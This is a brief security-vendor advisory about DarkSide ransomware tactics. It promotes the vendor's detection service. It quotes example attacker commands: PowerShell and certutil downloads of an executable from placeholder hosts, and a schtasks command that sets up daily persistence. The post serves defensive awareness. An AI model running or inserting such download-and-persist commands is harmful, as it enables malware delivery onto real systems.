With the recent high profile attacks of the Ransomware-as-a-Service Group, DarkSide, Binary Defense wants to assure our MDR customers they are protected.
Our unique detections identify threats throughout the various attack phases used by these specific actors. Our threat intelligence research indicates this group first focuses on initial access and persistence and then concentrates on latter attack stages by attempting post exploitation scenarios around lateral movement and targeting as many systems as possible for maximum impact and ransom.
When DarkSide first initiates …It downloads a payload from the Internet:
powershell -Command “(New-Object Net.WebClient).DownloadFile(‘http://Example/Example.exe’,’C:\Users\Public\update.exe’)“
Certutil.exe -urlcache -split -f http://NakedIP/payload.exe C:\Temp\update.exe
In both of these stages, the Binary Defense MDR agent detects the downloading of the file for both PowerShell as well as CertUtil which is used to obtain the files.
From there, the attacker focuses on persistence:
SCHTASKS /CREATE /SC DAILY /TN “MyTasks\Task1” /TR “C:\update.exe” /ST 11:00 /F
In this stage, the MDR agent picks up the persistence hook here for a scheduled task.
The Binary Defense Security Operations Center is fully up-to-speed on all of these various threats and we continue to monitor the situation closely. Rest assured, you are protected with Binary Defense MDR and we are always diligent to ensure our customers remain free of harm from cyberattacks.